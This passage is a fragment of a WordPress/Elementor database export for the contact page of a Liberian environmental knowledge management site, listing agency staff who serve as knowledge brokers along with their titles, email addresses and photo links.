href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24527,3620,'_elementor_edit_mode','builder'),(24528,3620,'_elementor_template_type','wp-page'),(24529,3620,'_elementor_version','3.0.16'),(24530,3620,'_wp_page_template','default'),(24531,3620,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a 